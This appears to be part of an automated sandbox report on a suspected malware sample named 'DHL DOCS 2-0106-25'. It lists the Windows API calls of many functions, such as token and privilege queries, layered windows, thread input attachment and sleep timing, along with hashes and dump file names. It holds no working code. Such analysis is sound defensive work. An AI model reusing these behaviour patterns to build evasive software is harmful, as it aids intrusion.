Instruction Fuzzy Hash: 8221D170519202DF8300DF28D8818EA77E4EE66324F204A5DF8A9C72A1DB30D996CF93

Function 00211571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00211014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0021102A
Part of subcall function 00211014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00211036
Part of subcall function 00211014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00211045
Part of subcall function 00211014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0021104C
Part of subcall function 00211014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00211062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002115BE
_memcmp.LIBVCRUNTIME ref: 002115E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00211617
HeapFree.KERNEL32(00000000), ref: 0021161E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 74c673c7ba15427b3b8e2d1f57a76d8d6a56942bc2d507ff87dbc9a9fce72ec2
Instruction ID: 46e715dfaec8c183b8f8ba499895e953c2e2ef155ca159ba8fe07aeeab1bd2f8
Opcode Fuzzy Hash: 74c673c7ba15427b3b8e2d1f57a76d8d6a56942bc2d507ff87dbc9a9fce72ec2
Instruction Fuzzy Hash: EC21BA31E11109EFDF00DFA4C948BEEB7F9EFA4344F184459E505AB241E731AAA4CBA0

Function 00242782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0024280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00242824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00242832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00242840

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: b5ea6c756f06347efcf8ba0372c8b49419974ddfcb992538021d308951d37218
Instruction ID: 886d01a70823238aa48835d5290b49a64e2c1b347a2ccb3b16c4b2266bb6c961
Opcode Fuzzy Hash: b5ea6c756f06347efcf8ba0372c8b49419974ddfcb992538021d308951d37218
Instruction Fuzzy Hash: 82212435215111EFD7189B25C844FAAB799EF45324F648148F4168B6D2CB71FC46CBA0

Function 002178F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00218D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0021790A,?,000000FF,?,00218754,00000000,?,0000001C,?,?), ref: 00218D8C
Part of subcall function 00218D7D: lstrcpyW.KERNEL32(00000000,?,?,0021790A,?,000000FF,?,00218754,00000000,?,0000001C,?,?,00000000), ref: 00218DB2
Part of subcall function 00218D7D: lstrcmpiW.KERNEL32(00000000,?,0021790A,?,000000FF,?,00218754,00000000,?,0000001C,?,?), ref: 00218DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00218754,00000000,?,0000001C,?,?,00000000), ref: 00217923
lstrcpyW.KERNEL32(00000000,?,?,00218754,00000000,?,0000001C,?,?,00000000), ref: 00217949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00218754,00000000,?,0000001C,?,?,00000000), ref: 00217984

Strings

cdecl, xrefs: 0021797B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 5ac6d7e73328744b5e8c03bfa674e0e50cecaa69ffcf4d99cacab31676246ad3
Instruction ID: 7e9e6a858d887f3940daacbe001d6429d043902a11c135ce137435a71f747cff
Opcode Fuzzy Hash: 5ac6d7e73328744b5e8c03bfa674e0e50cecaa69ffcf4d99cacab31676246ad3
Instruction Fuzzy Hash: 4011293A210342ABCB159F38D844EBA77F5FFA5350B10402EF906C72A4EB31D861C791

Function 00247CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00247D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00247D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00247D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0022B7AD,00000000), ref: 00247D6B

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 45239a6904f1960c4c68838be6fd2f654cca10cbe1fd6291f4fe2d33a6bc67f7
Instruction ID: 32acb6291345bd602c617c58adc032187c8ec5c73a09621630ba991a2a45a8ea
Opcode Fuzzy Hash: 45239a6904f1960c4c68838be6fd2f654cca10cbe1fd6291f4fe2d33a6bc67f7
Instruction Fuzzy Hash: F6117235625615EFCB149F68DC08E6A3BA9AF46360B258724F839D72F0D7309D61CB50

Function 00245660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002456BB
_wcslen.LIBCMT ref: 002456CD
_wcslen.LIBCMT ref: 002456D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00245816

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: ab2c881845e8269cdb02c9fcf3c7d99b509109784f3ccd365017a233ddf49ef0
Instruction ID: fb5e3f39cf90e841fd4b67f2ec1e12d082d13baece56d770595f6f00a7bdc613
Opcode Fuzzy Hash: ab2c881845e8269cdb02c9fcf3c7d99b509109784f3ccd365017a233ddf49ef0
Instruction Fuzzy Hash: 94112975620625A7EF28DF75CC85AEE776CFF11364F104026F955D6082E7B0C9A0CB60

Function 001E1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3033fc889f9fadfd361521515455c54a886faf1fcf42653325f5be5c87b73270
Instruction ID: 6c1307b9677ef7409fd09025f993537640a98483b66bff9d7f8dd4420b65e366
Opcode Fuzzy Hash: 3033fc889f9fadfd361521515455c54a886faf1fcf42653325f5be5c87b73270
Instruction Fuzzy Hash: F801A2B2206EDA3EF61126BA7CC9F6F661CEF917B8B310325F525521D2DB718C004270

Function 00211A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00211A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00211A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00211A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00211A8A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0806d2366ca76ae69aec9e6bb4e110cf8eab5d6bff9ae99ad90b327ce00b3da7
Instruction ID: 34b042461d4271d4702ad5bc90baf0d040db868d2f4d1fe3d8e1985c1438128c
Opcode Fuzzy Hash: 0806d2366ca76ae69aec9e6bb4e110cf8eab5d6bff9ae99ad90b327ce00b3da7
Instruction Fuzzy Hash: AD11F73A901219FFEB119FA5C985FEDBBB8EF18750F200091EA04B7294D6716E60DB94

Function 0021E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0021E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0021E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0021E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0021E24D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: a5dfc5267b92e1239d9bafa0006642c4a5c09e4d8a65ff3533fda554eb53ced6
Instruction ID: 9b55131b76df1ada7a6e35a564ade91030c19dabacc1ac7ceaf39405da6d8229
Opcode Fuzzy Hash: a5dfc5267b92e1239d9bafa0006642c4a5c09e4d8a65ff3533fda554eb53ced6
Instruction Fuzzy Hash: A111087AA05255BBCB019FACBC0DADE7FEC9B46321F104255FC14D3291D2B08D1087A0

Function 001DD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,001DCFF9,00000000,00000004,00000000), ref: 001DD218
GetLastError.KERNEL32 ref: 001DD224
__dosmaperr.LIBCMT ref: 001DD22B
ResumeThread.KERNEL32(00000000), ref: 001DD249

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: a6adcb65cab897b99e9c97dd75b419f05631ec44da6c050e6a30cbab38dd5ccc
Instruction ID: 3d9def08cad7f398fb07fdcce8ea70e98293ad16e394ab9008559afcab3769d9
Opcode Fuzzy Hash: a6adcb65cab897b99e9c97dd75b419f05631ec44da6c050e6a30cbab38dd5ccc
Instruction Fuzzy Hash: 3001D6368051047BC7115BA9EC09BAE7B6DDF92730F20025AF925922D0CF71C901C6A0

Function 001B600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001B604C
GetStockObject.GDI32(00000011), ref: 001B6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 001B606A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: b06efbbd13ed695559e87efefc89f13d1299a370ae90ce448b6793ecf75503ba
Instruction ID: 19635888d2630bdddcbfa0365adb37355365b5685f4eb64c365eb326a6e735ef
Opcode Fuzzy Hash: b06efbbd13ed695559e87efefc89f13d1299a370ae90ce448b6793ecf75503ba
Instruction Fuzzy Hash: 7C11AD72102508BFEF165FA5DC48EFABB6DFF293A4F100205FA0456020D73A9C60DBA0

Function 001D3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001D3B56

Part of subcall function 001D3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 001D3AD2
Part of subcall function 001D3AA3: ___AdjustPointer.LIBCMT ref: 001D3AED

_UnwindNestedFrames.LIBCMT ref: 001D3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 001D3B7C
CallCatchBlock.LIBVCRUNTIME ref: 001D3BA4

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 0fc5c3f0fb3fc0332af9ca935901b6af4b2eabcb1b283d3885431be9c6ccb54d
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 74010C32100149BBDF125F95CC46EEB7F6DEF58794F04401AFE5896221C732E961EBA1

Function 001E3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001B13C6,00000000,00000000,?,001E301A,001B13C6,00000000,00000000,00000000,?,001E328B,00000006,FlsSetValue), ref: 001E30A5
GetLastError.KERNEL32(?,001E301A,001B13C6,00000000,00000000,00000000,?,001E328B,00000006,FlsSetValue,00252290,FlsSetValue,00000000,00000364,?,001E2E46), ref: 001E30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001E301A,001B13C6,00000000,00000000,00000000,?,001E328B,00000006,FlsSetValue,00252290,FlsSetValue,00000000), ref: 001E30BF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a18666c0fb911000ca46700c93a8239eb28ff68a2c63922a3697d1118b4870b2
Instruction ID: f2f58d412ec4a7fdc1110c199268a5cf0e2095104ee7890ea031454904b5f123
Opcode Fuzzy Hash: a18666c0fb911000ca46700c93a8239eb28ff68a2c63922a3697d1118b4870b2
Instruction Fuzzy Hash: 27012036302B62ABCB318B7FBC4C96F7B989F45771B210620F925D3140C721D901C6E0

Function 00217464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0021747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00217497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002174AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002174CA

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: c02e93e7e088ae64996c99483d44a2a636d0da1588a58efc7b1eacc090ed7ef7
Instruction ID: 8ec2ef8c24f87e40661a09cf62f8d1722fea076c279dd6ef3ea788981da6137c
Opcode Fuzzy Hash: c02e93e7e088ae64996c99483d44a2a636d0da1588a58efc7b1eacc090ed7ef7
Instruction Fuzzy Hash: DC11A1B92163119BF7208F18ED08BD27BFCEB40B00F208569A656D6151D7B0E994DB60

Function 0021B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0021ACD3,?,00008000), ref: 0021B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0021ACD3,?,00008000), ref: 0021B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0021ACD3,?,00008000), ref: 0021B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0021ACD3,?,00008000), ref: 0021B126

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 501f6f820439e89bcb16d278d24e2bd43d8f5d6dd01a5ba8e6179adf5acda401
Instruction ID: 4927eb5dc75630c05a96cdd957a40fcb7ed292791f356227b147d6b7c0e59804
Opcode Fuzzy Hash: 501f6f820439e89bcb16d278d24e2bd43d8f5d6dd01a5ba8e6179adf5acda401
Instruction Fuzzy Hash: 4211A130C1251DE7CF019FE8E9586EEBBB8FF1A310F214095D949B2141CB3055A08B51

Function 00212DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00212DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00212DD6
GetCurrentThreadId.KERNEL32 ref: 00212DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00212DE4

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 6f8e876f27b673075ebec30b7f7e2bc9da9702f2addf5e113b876046859d1cb9
Instruction ID: 47e07f005e9bd3e3d8dc2e2436fac6ec2cd3a24e95ece2820a7f8999b6869e36
Opcode Fuzzy Hash: 6f8e876f27b673075ebec30b7f7e2bc9da9702f2addf5e113b876046859d1cb9
Instruction Fuzzy Hash: 3CE09275212628BBD7201FB6FC0DFEB3EACEF93BA1F214015F105D10809AA1C894C6B0

Function 00248863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 001C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001C9693
Part of subcall function 001C9639: SelectObject.GDI32(?,00000000), ref: 001C96A2
Part of subcall function 001C9639: BeginPath.GDI32(?), ref: 001C96B9
Part of subcall function 001C9639: SelectObject.GDI32(?,00000000), ref: 001C96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00248887
LineTo.GDI32(?,?,?), ref: 00248894
EndPath.GDI32(?), ref: 002488A4
StrokePath.GDI32(?), ref: 002488B2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 1ab9da0c59b84c59bba9375d4036d41391cfc4fc0f4a9fe2f9c4a5e457e25623
Instruction ID: 8f116180a69ff310c6dcb5c26dcb2837f6659bc974e60007e4b2a88b94803cd2
Opcode Fuzzy Hash: 1ab9da0c59b84c59bba9375d4036d41391cfc4fc0f4a9fe2f9c4a5e457e25623
Instruction Fuzzy Hash: 1CF05E3A052259FADB125F98BC0DFCE3F59AF16310F148100FA11650E2C7755521CFE9

Function 001C98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001C98CC
SetTextColor.GDI32(?,?), ref: 001C98D6
SetBkMode.GDI32(?,00000001), ref: 001C98E9
GetStockObject.GDI32(00000005), ref: 001C98F1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
